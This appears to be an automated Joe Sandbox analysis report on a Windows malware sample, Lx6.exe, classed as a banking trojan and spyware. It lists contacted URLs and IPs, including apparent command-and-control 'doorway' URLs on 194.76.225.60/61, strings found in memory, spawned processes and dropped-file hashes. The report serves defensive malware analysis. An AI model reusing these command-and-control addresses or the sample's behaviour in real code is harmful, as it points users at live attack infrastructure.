http://194.76.225.60/doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr	0%	Avira URL Cloud	safe
http://194.76.225.61/doorway/b6wMkPt4iWosnbXK8RWvn/wQ2bkOJqcdbdcNhg/tg0Z3ks_2FXcWvb/njy6I8DMVjfhayfvGk/AHmjUevns/VlDNJo0_2B7BLsOhWepg/SFW_2F2h4VyZK2j7bvO/pwSb1f2R_2B4_2FNz_2Fk5/AtvhdDlWA69Wm/XRrBsoYg/JvQOOWqnl_2BSVvJf6ZjHAL/wi1PXKezi1/T9UASDBDRIpvMBY_2/FoQu0ao4VHCM/ZdN_2Bl0_2B/R_2BeX3PT9oLhg/3PUDsQH9gNCwUAZWN3W4_/2BLY_2F_2F1_2F3U/UklFvieJ/d91ke0Bg/KsQU9iQ.drr	0%	Avira URL Cloud	safe
http://194.76.225.60/doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr	0%	Avira URL Cloud	safe
http://curlmyip.net	0%	Avira URL Cloud	safe
https://www.hoeren-heute.ch/d/nulltarif_offer/?act=ACT0000045540ACT&utm_source=mcrs&utm_medi	0%	Avira URL Cloud	safe
http://ns.adobe.ux	0%	Avira URL Cloud	safe
https://www.hoeren-heute.ch/d/horizon_reveal/?act=ACT0000044974ACT&utm_source=mcrs&utm_mediu	0%	Avira URL Cloud	safe
http://ns.adobe.cmg	0%	Avira URL Cloud	safe
http://curlmyip.net1g	0%	Avira URL Cloud	safe
http://194.76.225.61/doorway/bRzGSLjweAbH/PVfy51BTQqO/lWZDAcFYwrYEOw/P1069Ds4xjESTY05mmd1_/2ByVzroc4cimG4A8/PzkyhLRGCX0aFw5/Jtve4MdzfQJPkPgA2k/NTDeHmvoJ/_2B7yHjl7zuPv_2Brki5/vNALnLBqmQChxlgwPJX/YMRMYrIxai4T4_2BKHDViB/Hv_2BBzVFkjNS/FgarEETc/294Vv6pgzz58Ssm8O4z7jEg/g3Dq3u6_2B/toSBBRie0B5BZcweG/l7bNSU7DgvscLKrC/Sp3p.drr	0%	Avira URL Cloud	safe
http://194.76.225.61/doorway/8DqiRUYpN1g/urg4gk8belU2Hp/6R_2FaNTBZnVkLTOVWhaX/cRir_2FDANkaaRhV/ClRbP8o7eYAfvcj/15sk13GdbMsMo5M_2F/JnE3OOrX1/Yn3LiAEserhxrqJvZEPb/e6YS2cNRsGxIjllZdqY/7_2FRYI58Sw6j4ExBQcowc/5qMbTW7lnZmjK/j8COe_2F/4naQldFBQDlP42ux0j7rpPZ/VYnkJGg8xi/iWRQWDs2GHiDVoqIT/U1cLh8zIJ54C/3jdFHxCPndA/7QWrJ8HiTz2ZrO/n84c0VWLTOO/rD8u.gif	0%	Avira URL Cloud	safe
http://ns.micro/1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
a-0003.a-msedge.net	204.79.197.203	true	false	high
apnfy.msn.com	unknown	unknown	false	high
tel12.msn.com	unknown	unknown	false	high
www.msn.com	unknown	unknown	false	high
1.0.0.127.in-addr.arpa	unknown	unknown	false	high
8.8.8.8.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://194.76.225.61/doorway/uRv392Rtz866/nti_2ByAL1r/R8CkJ_2BndSyRx/sIG44fcYL4SmExCi0ACI7/oER1nF0Bt2Tpxtf8/pvf2xzyDmqE4uH6/atElJIeiaCGvRyaYTW/O_2Bb7sZx/7GOqqpJyOKdZvhgFoplL/gFpgB_2BgQj834VvyfM/T9x1pruFqGyVhzjoXgN9Yh/z5CHc_2FavqJW/MXQOJsyO/VzU5_2FcjvOlXkGZhClQ7RM/oSy78PufE2/FJvd3_2FTRM8OrG4Y/ryVNLZn8s_2B/KVoRzz7Jpgf/a.gif	true	Avira URL Cloud: safe	unknown
http://194.76.225.60/doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr	true	Avira URL Cloud: safe	unknown
http://194.76.225.61/doorway/b6wMkPt4iWosnbXK8RWvn/wQ2bkOJqcdbdcNhg/tg0Z3ks_2FXcWvb/njy6I8DMVjfhayfvGk/AHmjUevns/VlDNJo0_2B7BLsOhWepg/SFW_2F2h4VyZK2j7bvO/pwSb1f2R_2B4_2FNz_2Fk5/AtvhdDlWA69Wm/XRrBsoYg/JvQOOWqnl_2BSVvJf6ZjHAL/wi1PXKezi1/T9UASDBDRIpvMBY_2/FoQu0ao4VHCM/ZdN_2Bl0_2B/R_2BeX3PT9oLhg/3PUDsQH9gNCwUAZWN3W4_/2BLY_2F_2F1_2F3U/UklFvieJ/d91ke0Bg/KsQU9iQ.drr	true	Avira URL Cloud: safe	unknown
http://194.76.225.60/doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr	true	Avira URL Cloud: safe	unknown
http://www.msn.com/	false		high
http://194.76.225.61/doorway/bRzGSLjweAbH/PVfy51BTQqO/lWZDAcFYwrYEOw/P1069Ds4xjESTY05mmd1_/2ByVzroc4cimG4A8/PzkyhLRGCX0aFw5/Jtve4MdzfQJPkPgA2k/NTDeHmvoJ/_2B7yHjl7zuPv_2Brki5/vNALnLBqmQChxlgwPJX/YMRMYrIxai4T4_2BKHDViB/Hv_2BBzVFkjNS/FgarEETc/294Vv6pgzz58Ssm8O4z7jEg/g3Dq3u6_2B/toSBBRie0B5BZcweG/l7bNSU7DgvscLKrC/Sp3p.drr	true	Avira URL Cloud: safe	unknown
http://www.msn.com/de-ch/	false		high
http://194.76.225.61/doorway/8DqiRUYpN1g/urg4gk8belU2Hp/6R_2FaNTBZnVkLTOVWhaX/cRir_2FDANkaaRhV/ClRbP8o7eYAfvcj/15sk13GdbMsMo5M_2F/JnE3OOrX1/Yn3LiAEserhxrqJvZEPb/e6YS2cNRsGxIjllZdqY/7_2FRYI58Sw6j4ExBQcowc/5qMbTW7lnZmjK/j8COe_2F/4naQldFBQDlP42ux0j7rpPZ/VYnkJGg8xi/iWRQWDs2GHiDVoqIT/U1cLh8zIJ54C/3jdFHxCPndA/7QWrJ8HiTz2ZrO/n84c0VWLTOO/rD8u.gif	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.msn.com/de-ch/news/other/r%c3%a4uber-muss-nach-%c3%bcberfallserie-mehr-als-drei-jahre-in	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://constitution.org/usdeclar.txtC:	Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://curlmyip.net1g71lXXnduT6klnGfile://c:	RuntimeBroker.exe, 00000013.00000002.860670049.000002240CD05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858831162.000001D023E05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856155256.000001489B505000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000043.00000002.778448031.000001FA9DC8D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://https://file://USER.ID%lu.exe/upd	Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://ns.adobe.cmg	RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://deff.nelreports.net/api/report?cat=msn	Lx6.exe, 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.388832296.000000000131B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ogp.me/ns/fb#	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ns.adobp/E	RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com/	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/de-ch/finanzen/nachrichten/angebotsmieten-in-allen-kantonen-gestiegen/ar-AA12OUn	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://curlmyip.net1g	powershell.exe, 0000002D.00000002.856115183.00000191D3AAF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://browser.events.data.msn.com/OneCollector/1.0/t.js?qsp=true&anoncknm=%22%22&name=%22M	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ns.adobe.ux	RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.tippsundtricks.co/sonstiges/diese-96-jahre-alte-dame-will-ihr-haus-verkaufen-wenn-du-dir	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/de-ch/sport/other/z%c3%bcrich-und-winterthur-zeigten-wo-sie-stehen/ar-AA12LPId?o	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.558784999.0000021F35581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.861404017.00000191D4411000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/de-ch/nachrichten/schweiz/ja-er-will-r%c3%b6sti-gibt-seine-kandidatur-bekannt/ar	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 0000000E.00000000.541728807.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.481741357.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.517838181.0000000008260000.00000004.00000001.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/de-ch/news/other/bewaffnete-m%c3%a4nner-%c3%bcberfallen-luzerner-bar/ar-AA12NkUo	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://curlmyip.net	RuntimeBroker.exe, 00000013.00000002.860670049.000002240CD05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858831162.000001D023E05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856155256.000001489B505000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856115183.00000191D3AAF000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000043.00000002.778448031.000001FA9DC8D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.tippsundtricks.co/lifehacks/dose-offnen/?utm_campaign=DECH-Dose&utm_source=MSN&u	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/de-ch/shopping	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.hoeren-heute.ch/d/horizon_reveal/?act=ACT0000044974ACT&utm_source=mcrs&utm_mediu	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/news/other/bundesratswahl-alle-augen-richten-sich-nach-bern/ar-AA12LMZu?oc	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.tippsundtricks.co/saubermachen/reinige-dusche-spulmaschinentab/?utm_campaign=DECH-spulit	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.hoeren-heute.ch/d/nulltarif_offer/?act=ACT0000045540ACT&utm_source=mcrs&utm_medi	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.tippsundtricks.co/lifehacks/dosenoeffner-falsch-benutzt/?utm_campaign=DECH-canopen&u	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.msn.com/de-ch	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ipinfo.io/ip	cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/de-ch/news/other/wie-deine-abgeschnittenen-haare-seen-s%c3%a4ubern-k%c3%b6nnen/a	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://constitution.org/usdeclar.txt	Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ogp.me/ns#	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/de-ch/sport/other/fcz-bleibt-letzter-lugano-schl%c3%a4gt-basel-servette-und-luze	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ns.micro/1	RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.76.225.60	unknown	Germany	58329	RACKPLACEDE	true
194.76.225.61	unknown	Germany	58329	RACKPLACEDE	true
204.79.197.203	a-0003.a-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	720586
Start date and time:	2022-10-11 15:00:24 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 11s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Lx6.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	89
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	4
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spre.bank.troj.spyw.expl.evad.winEXE@132/40@6/4
EGA Information:	Successful, ratio: 83.3%
HDC Information:	Successful, ratio: 3.2% (good quality ratio 3.2%) Quality average: 90.9% Quality standard deviation: 14.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 52.169.118.173, 131.253.33.203
Excluded domains from analysis (whitelisted): redirection.prod.cms.msn.com.akadns.net, icePrime.a-0003.dc-msedge.net, legacy-redirection-neurope-prod-hp.cloudapp.net, a-0003.dc-msedge.net
Execution Graph export aborted for target mshta.exe, PID 6016 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:02:07	API Interceptor	36x Sleep call for process: powershell.exe modified
15:03:23	API Interceptor	1x Sleep call for process: WMIC.exe modified

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	91
Entropy (8bit):	3.964980110923723
Encrypted:	false
SSDEEP:	3:ApEeKm8RKQB2LI/cAtAFqyLAIRlKFvBFGmWLn:ApEVNB2LI/xyFqyLbgzGdn
MD5:	99BDE3452748E34D6C50275110A6A8D4
SHA1:	E79CB2A8DB7D8490523529D3861F95BA73A20C23
SHA-256:	D07311ACF641866E7E84823D2962F593BB655792301DC61AD6F0C6869D9C5937
SHA-512:	19FD529C6FE60BBBE3710FED93F14D723A13AD427431F855ED84F5E5E496B9F3EB8A6E8C31D740239EB225753D52A4F464B489FDBDEFF4477480026263D0F691
Malicious:	false
Reputation:	unknown
Preview:	Cookies are no longer stored in files. Please use InternetCookie APIs to access cookies.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.8910535897909355
Encrypted:	false
SSDEEP:	192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
MD5:	7A57D8959BFD0B97B364F902ACD60F90
SHA1:	7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
SHA-256:	47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
SHA-512:	83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
Malicious:	false
Reputation:	unknown
